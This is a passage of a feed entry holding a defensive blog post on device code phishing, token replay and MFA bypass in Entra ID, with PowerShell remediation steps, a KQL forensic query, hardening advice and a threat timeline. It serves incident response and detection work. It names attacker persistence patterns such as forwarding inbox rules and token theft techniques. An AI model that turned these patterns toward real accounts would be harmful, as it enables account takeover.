style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object Id,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        @{N='DisplayName';E={$_.AdditionalProperties.displayName}},</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        @{N='RegistrationDateTime';E={$_.AdditionalProperties.registrationDateTime}},</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        @{N='TrustType';E={$_.AdditionalProperties.trustType}} |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Sort-Object RegistrationDateTime -Descending</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Compare against known-good devices; delete suspicious ones by their directory object Id:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Remove-MgDevice -DeviceId \"&lt;suspicious_device_id&gt;\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 4: Remove malicious inbox rules created for persistence</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-ExchangeOnline</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Forwarding, redirecting and deleting rules are the usual persistence patterns</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-InboxRule -Mailbox $userId |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Where-Object { $_.DeleteMessage -or $null -ne $_.ForwardTo -or $null -ne $_.ForwardAsAttachmentTo -or $null -ne $_.RedirectTo } |</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object Name, ForwardTo, ForwardAsAttachmentTo, RedirectTo, DeleteMessage, MarkAsRead</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Remove any rules not created by the user:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Remove-InboxRule -Mailbox $userId -Identity \"&lt;rule_name&gt;\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 5: Remove OAuth application consent grants</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-MgUserOAuth2PermissionGrant -UserId $userId | </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Select-Object Id, ClientId, Scope, ConsentType</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Remove-MgOAuth2PermissionGrant -OAuth2PermissionGrantId \"&lt;grant_id&gt;\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Step 6: Check for new MFA methods added by attacker</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-MgUserAuthenticationMethod -UserId $userId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Look for unrecognized phone numbers, TOTP authenticators, or FIDO keys</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"72-forensic-timeline-reconstruction\">7.2 Forensic Timeline Reconstruction<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#72-forensic-timeline-reconstruction\" class=\"hash-link\" aria-label=\"Direct link to 7.2 Forensic Timeline Reconstruction\" title=\"Direct link to 7.2 Forensic Timeline Reconstruction\" translate=\"no\">​</a></h3>\n<p>After containment, reconstruct exactly what the attacker accessed:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Full activity reconstruction for a compromised account</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let CompromisedUser = \"victim@company.com\";</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let AttackStart = datetime(2025-01-15 23:00:00);</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let AttackEnd = datetime(2025-01-16 06:00:00);</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// All authentication 
events</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated between (AttackStart .. AttackEnd)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where UserPrincipalName == CompromisedUser</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Type=\"Interactive Sign-in\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          Details=strcat(AppDisplayName, \" from \", IPAddress, \" (\", </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          tostring(LocationDetails.countryOrRegion), \")\"),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          AuthProtocol = AuthenticationProtocol,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          Risk = RiskLevelAggregated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| union (</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    NonInteractiveUserSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated between (AttackStart .. 
AttackEnd)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where UserPrincipalName == CompromisedUser</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project TimeGenerated, Type=\"Silent Token Refresh\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              Details=strcat(AppDisplayName, \" from \", IPAddress),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              AuthProtocol = AuthenticationProtocol,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              Risk = RiskLevelAggregated</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| union (</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated between (AttackStart .. 
AttackEnd)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where InitiatedBy.user.userPrincipalName == CompromisedUser</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project TimeGenerated, Type=\"Directory Action\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              Details=strcat(OperationName, \": \", tostring(TargetResources[0].displayName)),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              AuthProtocol=\"N/A\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              Risk=\"N/A\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated asc</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, Type, Details, AuthProtocol, Risk</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-8--the-hardening-roadmap-what-actually-stops-this\">Part 8 – The Hardening Roadmap: What Actually Stops This<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-8--the-hardening-roadmap-what-actually-stops-this\" class=\"hash-link\" aria-label=\"Direct link to Part 8 – The Hardening Roadmap: What Actually Stops This\" title=\"Direct link to Part 8 – The Hardening Roadmap: What Actually Stops This\" translate=\"no\">​</a></h2>\n<table><thead><tr><th>Control</th><th>Priority</th><th>Complexity</th><th>Risk 
Reduction</th><th>Caveats</th></tr></thead><tbody><tr><td><strong>Block device code flow in CA</strong></td><td>P0</td><td>Low</td><td><strong>Eliminates device code phishing entirely</strong></td><td>Audit first; may break IoT/legacy integrations</td></tr><tr><td><strong>Enable NonInteractiveUserSignInLogs in SIEM</strong></td><td>P0</td><td>Low</td><td>Closes major detection gap</td><td>Log volume increase; ensure retention</td></tr><tr><td><strong>Phishing-resistant MFA (FIDO2 / Passkeys)</strong></td><td>P1</td><td>Medium</td><td>Eliminates AiTM credential theft</td><td>Requires hardware keys or compatible devices</td></tr><tr><td><strong>Block legacy authentication protocols</strong></td><td>P1</td><td>Medium</td><td>Eliminates SMTP/IMAP brute force</td><td>Break legacy apps first; test in report mode</td></tr><tr><td><strong>Require compliant device for all cloud apps</strong></td><td>P1</td><td>High</td><td>Token replay from unmanaged device fails CA</td><td>Requires full Intune enrollment; user friction</td></tr><tr><td><strong>Sign-in frequency: 1–4h for sensitive resources</strong></td><td>P1</td><td>Low</td><td>Limits token replay window</td><td>Re-auth friction for legitimate users</td></tr><tr><td><strong>CAE for Exchange/SharePoint/Teams</strong></td><td>P2</td><td>Low</td><td>Token revocation propagates in minutes</td><td>Requires CAE-capable clients</td></tr><tr><td><strong>Restrict OAuth app consent to admin-approved apps</strong></td><td>P2</td><td>Medium</td><td>Blocks illicit consent attacks</td><td>Administrative overhead for app approvals</td></tr><tr><td><strong>TPM enforcement on all Windows devices</strong></td><td>P2</td><td>High</td><td>Makes PRT extraction infeasible</td><td>Hardware refresh may be required</td></tr><tr><td><strong>Token Protection CA policy (preview)</strong></td><td>P2</td><td>Low</td><td>Binds tokens to specific devices</td><td>Preview feature; limited app support</td></tr></tbody></table>\n<h3 class=\"anchor 
anchorTargetStickyNavbar_Vzrq\" id=\"phishing-resistant-mfa-what-it-actually-means\">Phishing-Resistant MFA: What It Actually Means<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#phishing-resistant-mfa-what-it-actually-means\" class=\"hash-link\" aria-label=\"Direct link to Phishing-Resistant MFA: What It Actually Means\" title=\"Direct link to Phishing-Resistant MFA: What It Actually Means\" translate=\"no\">​</a></h3>\n<p>\"Phishing-resistant MFA\" specifically refers to authenticator methods where the credential is <strong>cryptographically bound to the relying party origin</strong>, meaning even an AiTM proxy cannot intercept it.</p>\n<p>This applies to:</p>\n<ul>\n<li class=\"\"><strong>FIDO2 security keys</strong> (YubiKey, etc.): The private key never leaves the hardware token; the challenge response is scoped to the exact origin domain</li>\n<li class=\"\"><strong>Windows Hello for Business</strong>: Tied to the device's TPM; cryptographically bound to the sign-in domain</li>\n<li class=\"\"><strong>Certificate-based authentication</strong>: Client certificates with hardware-backed keys</li>\n</ul>\n<p>This does <strong>not</strong> apply to:</p>\n<ul>\n<li class=\"\">TOTP / time-based codes (Microsoft Authenticator code): Can be intercepted by AiTM proxy in real time</li>\n<li class=\"\">Push notifications: Can be phished via MFA fatigue or forwarded</li>\n<li class=\"\">SMS OTP: Can be SIM-swapped</li>\n</ul>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-ciso-summary-what-to-do-monday-morning\">The CISO Summary: What to Do Monday Morning<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#the-ciso-summary-what-to-do-monday-morning\" class=\"hash-link\" aria-label=\"Direct link to The CISO Summary: What to Do Monday Morning\" title=\"Direct link to The CISO Summary: What to Do 
Monday Morning\" translate=\"no\">​</a></h2>\n<p><strong>1. Run the device code audit query today.</strong> Find out if device code phishing is already happening in your tenant. Pull 30 days of <code>SigninLogs</code> where <code>AuthenticationProtocol == \"deviceCode\"</code>. The results will either be reassuring or immediately actionable.</p>\n<p><strong>2. Ensure <code>NonInteractiveUserSignInLogs</code> are being ingested into your SIEM.</strong> If they're not, you have a blind spot for token replay. This is a configuration change, not a product purchase.</p>\n<p><strong>3. Put the \"Block device code flow\" CA policy into report mode immediately.</strong> See what breaks. You have 30 days of sign-in data to assess impact. Most environments will find near-zero legitimate usage.</p>\n<p><strong>4. Identify your highest-value accounts (executives, IT admins, finance leads).</strong> Enforce FIDO2 hardware keys for these users first. The threat model for a CFO being device-code-phished is categorically different from a general workforce user.</p>\n<p><strong>5. Create a token revocation runbook.</strong> When a token theft incident is confirmed, your team needs to execute the revocation sequence in under 10 minutes. 
If that process requires a 30-minute approval chain, the attacker has already pivoted.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"timeline-device-code-phishing-from-unknown-to-commodity-20212026\">Timeline: Device Code Phishing From Unknown to Commodity (2021–2026)<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#timeline-device-code-phishing-from-unknown-to-commodity-20212026\" class=\"hash-link\" aria-label=\"Direct link to Timeline: Device Code Phishing From Unknown to Commodity (2021–2026)\" title=\"Direct link to Timeline: Device Code Phishing From Unknown to Commodity (2021–2026)\" translate=\"no\">​</a></h2>\n<table><thead><tr><th>Date</th><th>Event</th></tr></thead><tbody><tr><td><strong>2021</strong></td><td>Secureworks documents OAuth device code phishing targeting Russia-linked threat actors; publishes SquarePhish</td></tr><tr><td><strong>Mid-2024</strong></td><td>Microsoft tracks Storm-2372 (Russia-aligned) using device code phishing against governments, NGOs, and enterprises across 15+ countries</td></tr><tr><td><strong>Feb 2025</strong></td><td>Microsoft publicly discloses Storm-2372 campaign; attributes with high confidence to Russian state actors</td></tr><tr><td><strong>June 2025</strong></td><td>ShinyHunters/Scattered Spider use OAuth token theft via Salesloft/Drift integration to breach Salesforce at 700+ organizations including Cloudflare, Zscaler, Tenable</td></tr><tr><td><strong>Sep 2025</strong></td><td>Proofpoint observes \"highly unusual\" surge in device code phishing campaigns; multiple threat clusters adopt simultaneously</td></tr><tr><td><strong>Oct 2025</strong></td><td>TA2723 (financially motivated) begins using device code phishing at scale; technique crosses from APT to commodity cybercrime</td></tr><tr><td><strong>Dec 2025</strong></td><td>Proofpoint publishes research; SquarePhish2 and Graphish phishing kits publicly 
documented</td></tr><tr><td><strong>Feb 2026</strong></td><td>EvilTokens PhaaS platform emerges; device code phishing fully commoditized as a service offering</td></tr><tr><td><strong>Apr 2026</strong></td><td>Microsoft documents AI-enabled device code phishing campaign using dynamic code generation and Railway.com backend automation</td></tr></tbody></table>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"references\">References<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#references\" class=\"hash-link\" aria-label=\"Direct link to References\" title=\"Direct link to References\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\">Microsoft Security Blog: \"Inside an AI-enabled device code phishing campaign\" (April 2026)</li>\n<li class=\"\">Proofpoint: \"Access granted: phishing with device code authorization for account takeover\" (December 2025)</li>\n<li class=\"\">Dirk-jan Mollema: \"Introducing ROADtools\" and PRT research (roadlib.readthedocs.io)</li>\n<li class=\"\">Ontinue: \"Tycoon 2FA Phishing Kit\" threat intelligence report (2025)</li>\n<li class=\"\">CISA Alert AA25-039A: OAuth 2.0 Device Authorization Abuse</li>\n<li class=\"\">Microsoft Documentation: Conditional Access authentication flows policy</li>\n</ul>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"further-reading\">Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#further-reading\" class=\"hash-link\" aria-label=\"Direct link to Further Reading\" title=\"Direct link to Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/how-attackers-abuse-entra-id-oauth-without-malware\">How Attackers Abuse Entra ID &amp; OAuth Without Malware</a>: consent abuse, service principal backdoors, and token theft without MFA bypass</li>\n<li 
class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/apt-initial-access-to-domain-dominance-4-hours\">How APT Groups Pivot from Initial Access to Domain Dominance in Under 4 Hours</a>: what happens after identity is compromised</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/windows-event-log-architecture-siem-missing-events\">Windows Event Log Architecture: Why Your SIEM Is Missing 30% of Events</a>: verify the sign-in logs feeding your detections are complete</li>\n</ul>",
            "url": "https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access",
            "title": "MFA Bypass in 2025 to 2026: Device Code Phishing, Token Replay, and Why Your Conditional Access Policy Isn't Enough",
            "summary": "How device code phishing, token replay, and PRT abuse bypass MFA in 2025–2026  with KQL detections and Conditional Access hardening for enterprise defenders.",
            "date_modified": "2026-04-17T00:00:00.000Z",
            "author": {
                "name": "Inference Defense",
                "url": "https://inferencedefense.com"
            },
            "tags": [
                "identity-security",
                "threat-intelligence",
                "cloud-security",
                "mfa-bypass",
                "device-code-phishing",
                "token-replay",
                "conditional-access",
                "entra-id",
                "microsoft-365",
                "detection-engineering"
            ]
        }
    ]
}